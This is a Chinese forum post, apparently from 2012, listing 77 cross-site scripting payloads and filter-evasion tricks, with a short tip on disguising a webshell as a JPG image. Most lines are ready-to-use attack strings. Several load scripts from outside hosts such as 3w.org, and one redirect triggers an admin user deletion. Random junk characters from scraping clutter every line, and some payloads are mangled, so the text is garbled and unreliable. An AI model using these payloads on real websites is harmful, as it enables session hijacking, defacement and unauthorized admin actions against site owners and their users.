跨站图片shell
9 i8 J; {1 m$ v' u3 QXSS跨站代码 <script>alert("")</script>; T' s4 x. N. u4 K) @8 F4 l
3 L: t& h% N$ Z0 o5 Z将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
7 i M5 J- R0 Z7 R2 c
/ h! G3 ^6 h. X6 X2 Z& r" P
$ ?# a. x! f- n
) c5 p7 n e9 E4 w" w/ L1)普通的XSS JavaScript注入" m! w9 M2 G6 i# g
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>3 _( W b' F1 Q2 s1 r7 u y1 b
! y* W; M' ^! H: `4 M s% Z
(2)IMG标签XSS使用JavaScript命令 z7 Z8 k8 x/ |6 ~- O; y4 p5 [
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>( q$ D0 d. l9 ]& \" v% _/ @5 b' M" t
; Q* f1 P# B7 Z0 v
(3)IMG标签无分号无引号9 ~; }8 r/ }& Z a( Q
<IMG SRC=javascript:alert(‘XSS’)>4 g. n9 ^5 g6 z% |/ {2 u9 {5 ~- f
+ _; b+ i: O5 ?/ l/ l(4)IMG标签大小写不敏感
7 K) l4 J. E I7 [<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
1 p u$ C* {5 x9 z* s0 ]. t" E
' x, G4 p: [2 H! C* K(5)HTML编码(必须有分号)3 q+ A# V& J! Z! F7 a4 R) r0 U, j
<IMG SRC=javascript:alert(“XSS”)>
, Q0 t) J8 J- o$ d- b
. P W `+ r6 c' K(6)修正缺陷IMG标签
8 I' F+ K! s: z$ k. a0 D: R<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>2 B4 K; l, T. |0 S" C- y
4 f& v. h! |7 |; K% S. u% C
(7)formCharCode标签(计算器)
" q8 q9 N9 S8 w8 H9 k& I$ x<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
/ d) }8 V. ~0 a% \4 n8 W0 P5 _ h0 m; \4 Z4 I
(8)UTF-8的Unicode编码(计算器)0 @0 D9 \ Z1 o- n
<IMG SRC=jav..省略..S')>
6 G$ C7 R! [) @( x$ h& f0 i% ]+ e# g v; J8 F; v6 o- R
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)% p: ^, B! q+ J- A, a5 z
<IMG SRC=jav..省略..S')>' @1 } T3 J' e, l8 E, A
' \3 }8 i& h3 |) r; ]: v(10)十六进制编码也是没有分号(计算器)1 O3 a1 t4 z; W8 Q: y
<IMG SRC=java..省略..XSS')>6 \8 W4 o) ?9 h, E. V) Q! w6 _- L2 s
+ W3 Z( w' ^# C2 h
(11)嵌入式标签,将Javascript分开
, o% m( a" ~8 P+ K! r<IMG SRC=”jav ascript:alert(‘XSS’);”>
5 M/ X( Q; ^! J. a) Z( P; @; z, \+ Y9 T, O' W0 P
(12)嵌入式编码标签,将Javascript分开
; }' n% N2 s+ F' ]2 D" [<IMG SRC=”jav ascript:alert(‘XSS’);”>
X; D$ F0 S6 l
( g. {. Z# `( r% L5 O. V(13)嵌入式换行符
* x7 e) j/ |4 t" S ^5 R2 {<IMG SRC=”jav ascript:alert(‘XSS’);”>
0 y2 g* k3 D4 s. K/ U/ ^3 D: i) g8 Z1 T" n$ R; }) l: |: o- u+ d* {2 |
(14)嵌入式回车0 o2 A/ M M) f& C1 q
<IMG SRC=”jav ascript:alert(‘XSS’);”>
3 e4 G# p1 E1 E: N
- z2 b+ u/ U5 G: F: f8 _(15)嵌入式多行注入JavaScript,这是XSS极端的例子
8 T2 Z' A1 b- I" q<IMG SRC=”javascript:alert(‘XSS‘)”>
; \" w2 c# X; G! Q" R) @& [. L, p2 S! _/ d, D% G
(16)解决限制字符(要求同页面)
% f* K: V! N, P1 z<script>z=’document.’</script>2 O! W! N& y* e# ^! q2 G
<script>z=z+’write(“‘</script>3 C* N% A: r# t
<script>z=z+’<script’</script>1 { j* f3 R. V
<script>z=z+’ src=ht’</script>
7 T R# q2 Q2 V& S1 L5 u) ~, `5 G<script>z=z+’tp://ww’</script>% ^% g2 o% j: N# ~0 U; n6 A. a, G9 n
<script>z=z+’w.shell’</script>7 X4 J. ~" a8 s+ i) c
<script>z=z+’.net/1.’</script>- @+ c6 Z( O* D1 ?* o
<script>z=z+’js></sc’</script>2 O, b4 r& h$ ^0 b+ Y9 w& {) y- B
<script>z=z+’ript>”)’</script>; }% e( X+ @3 c, M6 i
<script>eval_r(z)</script>
( O/ U6 {- c# f z' }5 M, v, o8 Y5 I( s
(17)空字符
! }! {; @3 \1 x0 {perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out1 ?* c2 e7 `$ }5 g$ a
5 g% q( ?- s. I1 i0 ?8 U' D9 [0 v(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用5 D$ Q8 \9 m5 i. I! e. T
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
$ E$ {, {2 }% ?
9 w9 K7 }' u. ?(19)Spaces和meta前的IMG标签0 o6 D+ N# k; S$ j
<IMG SRC=” javascript:alert(‘XSS’);”>
7 {- ^; y8 W n2 O! E% x; o
) \4 `$ g+ A9 L(20)Non-alpha-non-digit XSS
& I( K# N1 _3 a<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
! ^2 {; a2 t* ~$ D4 _( r8 A
B! l! w) W6 d! G(21)Non-alpha-non-digit XSS to 2% z/ J% N& L8 C k4 i
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
- _+ t9 i+ _7 {3 E
5 r7 u2 R1 `# W9 [' D; Y(22)Non-alpha-non-digit XSS to 3
$ _4 n Y% U$ G2 ^<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>) E5 b( j6 w m; V" G% X5 e; ~
; Q9 c, H. H/ R _8 V# g" F(23)双开括号" F+ h" t( g( S, U! T+ B: D
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
2 o5 B* b s% Q1 I3 n- F
a# V2 P5 q' N Z(24)无结束脚本标记(仅火狐等浏览器)9 v3 ~ K- ~1 u1 C9 |
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>3 [9 a6 @( ]4 V8 b V
6 _1 J4 c! @: N6 o! _( D5 N(25)无结束脚本标记25 ]4 m H0 B- ^: K9 \. X
<SCRIPT SRC=//3w.org/XSS/xss.js>
$ ], {5 b5 b# v% h3 U% k8 i2 Y# B8 H. f, r! y
(26)半开的HTML/JavaScript XSS. ^; f& A. I% k8 P+ H* |" G, M
<IMG SRC=”javascript:alert(‘XSS’)”; q$ ^0 `/ J% i3 t7 A
( f/ J' M. c7 L9 b
(27)双开角括号 A( |4 z% T2 S
<iframe src=http://3w.org/XSS.html <
5 m7 v. R5 ^5 I4 i3 p5 {* _6 W
8 N$ N* I% L3 w3 J(28)无单引号 双引号 分号1 q1 z7 c* f! g2 z! [3 q
<SCRIPT>a=/XSS/7 _3 g5 E. o p. X3 Y; \/ C8 x
alert(a.source)</SCRIPT>
1 [! K) j( q% E6 o; d$ U
1 _0 T' g* L& D+ | l9 ^(29)换码过滤的JavaScript
. h' T* k, }' t2 W9 P\”;alert(‘XSS’);//
% S; M1 j# h; S1 j2 K0 d; x% x
- l" R# q5 \, _) g) R7 o: @6 X(30)结束Title标签
1 i& J5 \+ | @3 L' P, B9 p</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>/ `+ l% m0 A1 }- A# e7 X' A: z% ^4 v
1 [) H9 V7 _+ p- L/ R0 @. C. D- [: J
(31)Input Image
' ]$ ]- Z, c8 P0 P4 | P8 {<INPUT SRC=”javascript:alert(‘XSS’);”>
; T6 e, c. Y6 y% T$ v" H: z% U3 w
- F4 q" [- x8 B6 i- ]5 C(32)BODY Image
! l" Q/ A# l) h( z<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
8 O) W3 B, Y6 h8 o& a& C! \4 O
/ V z3 V. d$ ?9 W0 Y(33)BODY标签7 D Q4 \9 ?. R
<BODY(‘XSS’)>! `. |3 a3 p( z% H% q
' C j/ e( N3 o Y(34)IMG Dynsrc) j+ p V" L b
<IMG DYNSRC=”javascript:alert(‘XSS’)”>) W$ U; w0 i+ y1 f
! O$ p) `9 v' P- Q* V* O$ ?(35)IMG Lowsrc
. ? w+ f& y8 M<IMG LOWSRC=”javascript:alert(‘XSS’)”>
# s! ? j4 V) P6 L7 ?- R, u" N( J3 m9 O* L7 A4 K W
(36)BGSOUND
* t" ~& r$ k+ C+ F6 r- ~9 H<BGSOUND SRC=”javascript:alert(‘XSS’);”>9 G$ ^- S8 Z. A
: F) _$ L+ y% A, X s4 [, s0 N
(37)STYLE sheet
- t9 a# y3 A8 `' V" I<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>/ r7 h' m, i/ S+ B) a$ w$ N
: o( i9 Y( ]5 l/ A8 B6 v
(38)远程样式表
: i m/ @9 v; j$ o6 V<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”># ^6 d; Z7 J' }& r8 p2 n1 A
. Y5 u+ F- L [$ L
(39)List-style-image(列表式)
$ P4 d( H8 U8 }/ w, p& |) x<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS4 \3 a# `5 O9 n. T3 R2 A( B
$ ~* }3 X4 T8 q, t: H(40)IMG VBscript8 \* N" j3 g! e2 K* C7 z& ~* v/ @
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS- z/ S8 z0 E( h& G
* e' u9 L5 n. c& ]
(41)META链接url. q1 B- K; ]; @- l
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>- @ I, a' @7 m$ C2 _2 A, V
. n/ G. M/ Y# s/ {. p* |# u5 J4 n
(42)Iframe/ G7 @# B6 i" _9 u9 b0 U3 `5 b
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
% ]* L5 X; h; g# A(43)Frame1 F X5 @( e' a" l1 K& \4 x Q0 ~2 q
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>9 g5 j& M- f# \& t U3 W
6 Y) n+ u' z5 P1 [! x4 ]+ @, [(44)Table
$ u# _9 G. q7 H3 v1 f- }<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>$ x ]& l5 P+ N* M
% | S( X' s' ` \3 \. c/ l(45)TD
! p" ~! l' ?% ?3 `8 A- k2 k<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”> m9 ]! X) g1 |# M8 c
5 _$ ], X/ R; S j(46)DIV background-image4 r! l( }, j% n* c+ |/ ?
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>8 z, [) K+ `8 y- }. _$ I* I
1 ?) F$ {) C' p$ p. f+ a6 [3 y
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
$ M0 P$ @* J+ o$ M- e' l& L) _# A<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>* ]1 q; z% o- G: i& b
! j$ P, f' ]* E l% S5 X- ?. }3 V% k
(48)DIV expression
/ ?1 H% }5 \" E' i* P<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
4 E, F7 e. h/ _9 u Y9 n1 B- l7 V6 s5 ]4 G. t$ [$ |
(49)STYLE属性分拆表达! y! v6 ^0 j* r. D' q
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>$ D& t; ~, x# J' Q, m2 Z
1 @7 C8 J. |. ^4 S) t(50)匿名STYLE(组成:开角号和一个字母开头)
& v+ R& z, Z6 ?3 n9 \<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
2 ^" c. X% H) u! F7 G' d% R
( [5 B( M i% j: y(51)STYLE background-image+ f. W( e- E' e% n
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
n) J+ L; S, i% a, R9 S' @5 @! q! h& s) A: G* `$ W
(52)IMG STYLE方式
1 ~% P9 r2 V5 H4 O; Q6 zexppression(alert(“XSS”))’>2 K: ]: H2 C$ [8 r4 h) F
k6 t6 r' E6 C: U: [; ?9 |(53)STYLE background8 O: {( v) N3 ?' t+ p; A) B
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>! s# O4 ], @9 D6 D
. t" i/ r* e1 h7 j) Q- e x2 d
(54)BASE; H$ U$ y# T; P
<BASE HREF=”javascript:alert(‘XSS’);//”>$ ~1 r, C9 M6 B8 J% [' o- u
S1 g4 H0 t' a6 e
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
7 D) e) T: F- D: e<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>; ?3 J5 ^9 M9 j7 M
/ ~4 P- Z; s1 C(56)在flash中使用ActionScrpt可以混进你XSS的代码0 o3 m' u% j& s3 z
a=”get”;
# w; U9 w! u1 S Y' Hb=”URL(\”";9 G' ~$ G8 q9 {$ Y/ u% \( S5 A6 r
c=”javascript:”;
! T. U* i# u9 \2 J: J4 ]9 K" Sd=”alert(‘XSS’);\”)”;8 I! N2 `7 _5 b7 E! |+ Z$ e, W' ]
eval_r(a+b+c+d);7 `6 q7 d' ?1 n
' T4 m! R! F! c4 o
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
2 P+ b$ @3 q5 n4 @ l0 Z1 e<HTML xmlns:xss>
, V8 |% i9 r' X0 H' B<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
9 \( I7 l* k+ A; {' m<xss:xss>XSS</xss:xss>8 |* ~" e7 e7 C7 s( Z
</HTML>% x5 L5 X, g8 f* j# g+ o+ L, L0 s" y
- ^0 B! n; {; K- a8 t(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
9 s1 b- n# S" i<SCRIPT SRC=””></SCRIPT>
8 l8 D' C6 W0 G0 f
8 P1 Y! c5 m# R! i, d Z! B, p+ p(59)IMG嵌入式命令,可执行任意命令
3 C/ h2 \5 c2 k3 B, j3 V2 o' }9 u' ~<IMG SRC=”http://www.XXX.com/a.php?a=b”>" K* W/ I$ ~" q
" F7 [$ Q* @9 h! C, J: r! u
(60)IMG嵌入式命令(a.jpg在同服务器)# J( e D! k* ^1 @
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser) r! s9 R: H7 u/ q1 _* `& y
2 E3 Q' i( e: j* p- z(61)绕符号过滤
3 V9 r8 I- t) r5 O9 [) @<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
/ B; I* ^1 v9 k, ? _
$ L% h% V1 b6 a; }(62)
2 h5 r" x: n6 i+ R' H8 O<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
) ^; ?+ ^: C3 K4 V4 e5 n5 z- U7 B
( }9 p) z7 E! @- n% ^2 F(63). e) Z/ j- E# V- r; M- V
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>- a! S6 i! |, @0 p6 C/ c, ~& Q/ e
& l3 ~6 m; M0 o. y
(64)
2 Q. R% R4 r) [* ?* h! b8 `<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
l0 x" z0 U- R0 y" y% x$ M/ l; ?' S) s
(65)
! R* ^; r& d% X<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>6 G0 k; k* u* a1 @% [" R' M! ?; u6 j
8 u) g& d8 w3 e! t# h3 z+ @(66)/ `- u% l) H' p# w% g/ ~9 {
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
- B. c+ v6 U0 o/ A, U& h; H" L& A( g5 k# t' X$ J, D6 P& ]" s! w
(67)
* I @' \2 h; O5 Z<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>& ]3 L. x. x- |& `4 v3 J
$ L8 `1 s+ A z8 B$ N1 Y& b(68)URL绕行" d8 C# c* s1 Z/ Z" b& d
<A HREF=”http://127.0.0.1/”>XSS</A>
( @# \3 t+ f5 F9 U; d, l8 c5 R6 Z5 n0 J6 {& N' K
(69)URL编码
' w4 o, M: W. I<A HREF=”http://3w.org”>XSS</A>; E) Q! E; z+ f9 q9 A
& c! c! x! P0 K0 W) D1 K8 @
(70)IP十进制- T4 ], L: L$ ~0 w% z. |
<A HREF=”http://3232235521″>XSS</A>
' R- t, N* Q$ |/ | [) T" U) N
; l8 A. F: N" U2 Q(71)IP十六进制
6 F0 v7 K8 k, M* c% d<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
4 y5 ~0 L' E& P" Q8 o: X4 ]: u- X/ G* n4 g
(72)IP八进制5 J2 o$ S3 d/ I1 ?( E
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
6 j2 J1 G5 s* f7 P- B) f/ @$ q. X7 x( ]! N" `/ F9 i" h8 m
(73)混合编码
& y7 z, I) w7 O$ B<A HREF=”h4 r' `3 J* X3 u8 J O
tt p://6 6.000146.0×7.147/”">XSS</A>
. Z4 y# ~( ?: W7 N" \! u/ e3 Q! ~4 u1 `0 V$ s% n
(74)节省[http:]( J2 p: L- M6 ?& v+ E
<A HREF=”//www.google.com/”>XSS</A>
% _; L5 e! g3 `, M; K. z8 q0 F# t& N
(75)节省[www]
7 N2 k/ K% t6 J I<A HREF=”http://google.com/”>XSS</A>1 I* Y! Q8 K0 N! Y/ K
: F0 U/ Z7 b# ~* s
(76)绝对点绝对DNS6 U* F/ B* N% o+ |, R2 A$ b2 }0 m
<A HREF=”http://www.google.com./”>XSS</A>
' g" z8 P6 g( L, K+ @! C" `& A7 G7 }8 j; Y6 H0 z/ o D
(77)javascript链接$ x8 |% x6 o$ U0 a" M5 \2 |0 ~
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
* a1 ]% ^/ f7 x( B$ E3 l |
发表于 2012-9-13 17:04:56
收藏
支持
反对